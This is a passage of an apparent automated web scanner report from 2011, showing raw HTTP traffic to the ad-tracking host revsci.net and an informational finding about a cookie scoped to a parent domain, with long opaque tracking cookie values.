ejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_5sIM="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpbp6V9WP6iKbjeS1EvCK92z+QAmHiwdDZ+f+wl0fqgVO/YN9QVaWSI9BZnKARTfXWibSIPnJq7tzxyHvpM8rrsQ0999uRzoYdDUACqK8KlRc8VEpSoi4+PIlrtEJQlytouWw6dC96fgeUr+dKggPLgfXiylONMY0q55xCcIxZE8H4AemN9wE3RroQ8voDHmn50qAV3cq0qWmm6gEF1GjqBAbU0BxW/w37ijU3aC2+bxvdVGtaRVCapU9n6YbrAcXQyGWhDSKe9AGBybjavzv4o5YCx6QPw8J5AfomXxQJJP13Q5WEesMNpG1rMsjPIknNckXTR4iBLm1ZFtq4IzjgHFfpfiS0Sf+Qu5eI5lXsfUPcuO84sfAokbZG9v+8yx9A0s4A1zqnI0xYN4Z9rL0CNLLZAhkTjUB2r0FP3Z1tAoyfpfjkEzRN/2wkV8S9ED0t+lckzRbm7ZPRh0uZF5+5JM6zO/ncjfhMyR0VXln4no+2eXmVbPSdh9MVDLJPFsQvwq7tLapTxfrcuJyCuaVTR1bntqayVd5qC/xG24AkZotSmk9IYpq8+AdoNWJu7/qxxQfsuTocbna7se0WMaGoEeGd73wVSDYWf0ynjWzIvfjqL1dn2O8Iq4VT+JxnzOZMkqEmpZu1oPpQottl4L9W4OpjBswqexePminO9R94+GIG2QXz6td11UfLXdpsHE+Fmubkl0IAWm/Ynub4uZ1OVG690SMjPvfD7K42AzzPXoaMhWx8cxz9rSICB3s2RuXrC1JmH6U6LEbakTvp+QYwifgD6zxWUvHtjddggTXDajDg+7MnBW3RWS/IHmZqhyEEe0DucGZb2hf5FHzeKal4wyQKB6xwBwWbA1+jW9PpYwHsmtJ3BnoKLfCydvqXQLF9dpxGkoFSFDVd5va4dSMaw7uS2qZld3DWlV5tZeUV2W3Qr12oXahUrt8/ekOJB31oKbMjTQ/6JElzKyreVAoLkPTF90/QBdRKh/Q3k5sgIIDBwFfIfEubP8z1F0W4KjeqlHHVhVC08/HcAzh3lp+L87xwXv12V3Kf72Jnw5puQER8cF5dFMBgJByT4wiNK+3RBJ0+8Zno7Mj70ShXC/oDYJO9viSdA4vbhGDYrVnqNxu2qWcDSuzi2np6h1rNR0+brZPnynugQRPvjyE+Y60xVdWQIGp/c/DrzLKU245EtADE/BeE09F7uQnmFRG8pn4HEzC0Iy0iScIErGzYl19E8csnKw5pwYQVnO9a3xLuMRgjgYMV7/lz/0nkP82nOF3w8i/F1P00S+yk9nFVCL9xvK9PZnadwe4jfyQ=="; rsi_us_1000000="pUM14y+nMBYULQEQO7/+CjMlvdJdDfSHjvo8ch/k5QlLiLA6sADJy1ejkCyDOO+/00HsFG9bRXE1UO6lLZhWf+0eMonYIJbEznaq7R+zgQFoYpUJ+1x1vk0eQsRzEKTlvWgOp7URNiAnidYWy35rdKSBH7VYkSbDZ5T+dm2PAY1Pbw1+D5RTLvKHembgsHY2UxE4NpfEViD8UUpNAWiA9ouHxO1ulQ160eYxBHLzQi5Zoaf/bGs9zjUKp1kc3sMIO1RqGyw+PEkbSnKGr9yT+rl5LZDV/ch1L92PfaKAhCdTjfJ1b6bHZBksjDpI6xx6EVpSwF2SPwjtnQfsCqMuPXgyQyEtGNnZum9sZLZWaMRkEyJ/9luf2te0/du4eEWtieXpjJNUTgVdfGFEY9TKCdslsuCKPIeQhX7m1YchNbbmIBNK1CwDofjdyBiqRZtzU6Hzitl9mjmp05C2JZguAjrujJLgwJQXJvj7hyx+xLVSb0mSWpdEywJjaNUJlttpRPXn3mwwB7WUov7tBSZT5Yw49gtvbgeR6vS/pYWO3Y9XI1eHqlL3n1CDwg8xBRWak2/69bsCjbXTbMMSJtLN0v5gBVlBeR2DD9NWA2HbvPjsqQE0fB/otaogzQgzUuJT3yFecoAfGp55+Lz27OhYR8wcNR3ZBfrvhhcyNJBCXvt70+WkSvjx8DPqFZ53R5JyA0JNpauWgOEmKjm++q8BXfAK7yRqNuQc9WJKdkL9Iv3EiV4hD3lpAW9b77VUQXHUdBQCPKorQuByi1kJICahjNh+sK7F9uFNParIk3qJosYR2M1h5gmiwt26uVxKxPCXzhSt8acviZE9e0CNbaWCwq9ajeNA/8EswRo0XRtcBY8juUWW6icPR3Taxs4hhNqKNuVaw2WfQc2FPpK6TTRYMbv/tjS2J9GxPBRtoBa2JmpjEQ2cwE6Zih6GfB1WT2QdegbRFaICdC+l/vKzbHrKq0VGMBifZSmcJO4CPCjVY//F9DAa8+m3o+aWkBghphs/ED28I48cTB7FTcWJHXuvpbQs6qk0sGGCL2Qm2G7jocOOpBHUBUB2HhPc31J7OThksnfG6M3RiPtJLoOhujGBo6UPvjAr74jA4OKswU78Y6NYg7EcLi6OHwPK5vKF6abTG9owpzKUW/j289fn6YrnC2vsPKnQAPD7xe5mP2s8DrgSglVqcCp3A5fzuvGlhpfGcdRpPWN/Gv12f7yeEbeEqLEuf0aEfDwsvv3YfI9jwzlZ62xFkzUQo4nv3UYwSdPkGxLhJRvFODOO/zg0k2D2rMrE2MIJ3Hg2d6bLlTIPKSp0S4fDgJqLoGboJuooDvPDIKDN54/AXqyRj2N5VlVNPV9EQaaOkht6r05/h1/+ndkpLqqYmi1MHwprxFHI3BUZbDjwjVMgRG5Sitdq0P0FayIBteX/DmOcKgl/QwCCbWd2j6o+bm3iHkNeX6Ysu9uMKYQctKtbd0XZDbJdqlGgMaSGGp2PJI1nl0O1F7wTDLDznMAzgCvcHkjs8NUFqyinHJSoJTxtiXWwV+qJ9Ahjuhnc9OIUSLAr/cQLAlxKFO/JYKbH8+iXdxCTUAiIGJNa6V0St0H3cUCDTHfCT0+uziiUlQ6ErjTkbyhdRdmHBIB2furhZOlKMF5eVUYV32R4xsMpnXQsL6A3bS9EG9mD4pA6lSdme9VhAelEZVjJjcHdy4Aq4sAfYP90TyQL5f3JeWl0UfCi9IO3ouNkdj75IzFryumqyw4Tlw+Y2FWyOVfSfodfY0FgRCVZ8VQhNZ1X9iYQDw=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50d/kuZA/wB4kkYzSDmmigS0klQapiS6HEpinuPg/h1WP6aBiozG80ftL+r3FpcNYlbfvi4IF12pvSN4gZoCQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6Wk9GL9HmpbJCCrFaeDS5h0D0WIolggMv/fNJOWq0vntsKGDBzKGBsUdIzcN0mSr75VwD603UY3u6ShdsaYshJs6U8VJLKvVmlbKyEmmB+L2lp9JqHsvRLqgLOl5XDKKRoQc/UBmorHEc/TIHBJFRVSZrobvtLMxEgZPYyKL0er8BWtYtV0dLN3aZo9p/px9SgBpbFrXxLEX1SLYZqrvcnVFUo3g64nONjUn/o+bNWHlXC6/gyl3syAq1j4FvExFWoTXBQ+1cB2yKM4hO2SOJ36fEeirt82DeCpboe+cnD9JZgSt6tgdDD7qFfWLRUPk7U7uupp/Vn4Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:14:53 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:14:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.210. http://pix04.revsci.net/I10985/b3/0/3/1008211/948985352.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/948985352.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JwQLVVzHG+gQ4O3XYcv0liDtqNncA2iFgL2J8AvNQGTGFQ+Pxd0pbW0Xm51WZTYVCOktTrquTMuOZBTTkw/IKBeEE1yCXK3b36BtHZFDnD6taOUzkVsstlxUvHpxx6DjOYyhPvK7p93Kw1M0xFLU8YywpcTCGhJkslmGD09u1vxbq9AgilVXTOe7YLMpaxwab1BrpZaOWmsitT5Y0P/+hoDI8UE/IyAMDpKGXhjriyhJgjfFE+ppfZQ32TSW00gZRkVJOtUxlY5Yo9vJAsssXzzkv8RozjQ2ow5LGokyTciv/oqeGkAgyA6qLu0UTvZKVMEDuiWMmkX0nGp7IALTzvYzZX1VV35S611OmwsUj/BtjCYFwhj0vIFQ3urxzt+UV7sjZoj7YCyIyN9dSpCyqSalgXxc/DVeFlZE2Y7rOhlNQYvwZnJF5d4moBJxG/sDxsjsX8Qa3Gsr4OpMi4bVqNzEkuCaDDEgu1UUc1X8n0QKuxspCuvu8Oejj9SwrWAhkuGz19zcg4YMGb4ewrib0GrKI2iHUVJMOl3syAixj4Kcld+V5pab1CYoBf0xuAw8eHaxH9EOfr4HWvqc7z7Ow+z3iq2GT7UWuqrMJW64IPWHK/tj2DnxcvlKsNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:24:23 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/948985352.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_1cgA="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M/kolpihGBjYoqAsRpDY+d3v4x1sEDEqqWlL0dsHqMnT4qYvPuvIDLGDoKV0u2u/nQqNyQHs6HfmYha+Qp5sTqWaE97/6FPY2NufszctJYIDjVFtpyQh0CIEl+vP19Tg4jHPRrL1oiOvClfFscr/RKjgNLgfXiymMN8Y0q76RCcLxZU8H4BemN9wU3Rrnc5uID/mn50qAZ3cq0qW2m6hEF1mjmBAbUUBxW/837ijb3ai2+byvdVGs69bCZJUNP1YbrAcXSyGGhDSJ+9OGByazaozl4o5YCx6QPw0J4Afomf1SJJv1jU7WEesMVpG13MujPIqvNckXzR4iALY1RHti6IzzgHEfpfiSUSZ+Qu5uI5lXsfTPcuW84sfAokbZG9v+8yt9CwtIA1zqnI61K2I5LgJ2sRxhRrGo5BewEEWOM1rnb6YcKt+ixKv8JqtUVRqc6w0NVrG73AEgEXgquAvSv6JbcqxAi+i5EhdNTO/2wLdw90m46mfW/8wkl1Sr90JvTdAm1UEcCu5sCUtyu/wbfXcP0cR5/OrED26jBVfmbcVyVuSLyQeAYVHfyjO1rAYm5MkK/skxrudTLb1wO/xPTVz9RjyynCte1piGlxh47XYMJhU4PZPk20PByDB0iGgOn7zk6NblTRwZklSk4B30GZYdg9I3ZVGGpwUUA+1dSyJaGjQtI3iDJb9r/oI7q16/HuwJ/BrR48PtTnMJaAzRKs+slNidHTMn8nFKOuzfVqG5r0HfDWKOonWg2pc/VYlLTQr5WZx4nCvQTtBHiOFZajukoRgblN6EJnEVmUCxShNvC5Kn3q7S7rMaXvMw73K6cjhj38wsR7xwiqyAihhY+KNM49AnIqRwl1H3R/rC04vWp7O39zuBse1+e81+ZavnfSUfN3HOZXuHoKWWbpqN9hOyiIfMkx8Ls2YzAYx773MMYaLrBRzyRBeUIcScN+e/5bB8+C9suShuybjNMZwLUYH0PGmqQ8IDjLUX90Y+QhCCGx2O+pn1jqiafw1zGlLzojzSP55URVG4i72oJHzdpPrDeY3qKtiXMWTp7SxNFT1pJhPM6do3MlrgpKSdNS6Fgu1yLIIISM27eIBfg5aGefTrXnl688BWkA4omwgRC39SniMzGkyDnk/amBACw32Yl3MKgeidHwaT44zCsHOMVxPlbbkjoK7Mk/LekmPqlM60X7+HgeSwnjQStxqzjoDcrOT3ql2RQCX46QR0v0nciKCpDoU0PKwqmKHHu98Kk5iynCM4EwCCyDUSpw92HNKxpMkGJuz8nqJEyEuZhgkxA8Hwjeop043adO25nf2g=="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIduu0zKlUsklaD7QC+F/ow1QxM58Yyl6WmyOefWQthJ9E3usr0THeqRusRn9KB39Zdv2hDh6RiPjHMpGwl7qzRB5eGo8GXOa1cwsHj5LNpFUOgdNaxE1qDMWcpRZkC09IWKwLqpNQkuxoXYih5PJZkgmuidZVc7/uuOinzqwcuujjpSFdDRG7FArDUD7k09ajbDzzCOJXGdTKjd1dhCqdcK/DW51mcevJzrCVyXUXwz4MKEEm7SUVd6CUcoDnUzXeAi/Ct/TuruCiMtaygwY0AtigC9uSei/+HoKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XiKBS91uetAb3fI46x9yMF7r2oOsBQZ6ASf282CVOAOSDpU+OHdhOmqH9BP7OtPwI6h5t0c0TJGQFsyGqe8EBAl9rUUd+/lb8i4NmbEp0msSsCmpY96IUsi2WHeHHBdJbtczxxe9YtzqmlXJgOVW2N0OOtjRHHcGRgW+RjXOgjoj/rUPitJ2tY9ei5VBtAVZNZiMtI66kkHcCkZcxcpXp0k0G5RsaG6ZuhGp1TcsCM8qnoAnK5/R22SWsNEs0BL2Bd9Nt2OfKDG9fv37uCDFLLFLVnsZjqOr6P+7cXdC3O+D6W+vTw11DUUhKee7Q26yPn1NuJYL80yE9k+I3B7OF8c6zcwzNGU5YPapEOJTPgs94gd6R2rYuQrEacwMq9LUyNhOe9O/w7j0XlrfqyiL/TUp4sRwiIdeFXJwsNPfqnNdeBCEZM978ug78IesbrO7bSJS3eczYGyrxw58MVPpjsdss9mZEceX722dcC8dDh3zf3gGHl2Hk7gBfLSYHAGT8VWC+iP/tvOT6qvay++mLGOoka8n2mli8dtZ7EQEPwvIFpx5myhLYgzTSkKgp8k+lr2WuWM4okUWVxgKfRSwRsdb7U0OWicRvr4P7oJ3wKSVkXQtlaKrkpW6RXne8QBre+uuU0/1fYyjJ+G/CtrBRFzYvfrmJjjQcZzs00zwWZxuhjS47hSaXZfWhziYSHbJjT8cUj9idijXlNnwZrvYkwdgwyVP/eZooADCjNhuHJfyzJY2ypfOQMKSvRxbLpHKncOeRzy0H6+3m4khWWoqxe5vF+mEBoeGJ2MSSTsQbGQROnvA+hnyOgPzo1R0lr0XJ/B+6BvJAke53gSlWLQq0mSSDB6q3pKvgBqpuq/+yrnyTMvsfLnFcbkDQQ3nfj5ghojztXatG6xK6HlOt1xn/T4qv6yscAj15NWENFatNh4Jyh17RVdHrplb/M3ttb/ueEv2kbBenr7VA/yZ1rcIdpuNDI+o+oRbF+EUZiuURAWwYp05qvjx6mOpnPqvGiXnWcD6ghotlltZc9F5xNMb/zScMVCE1X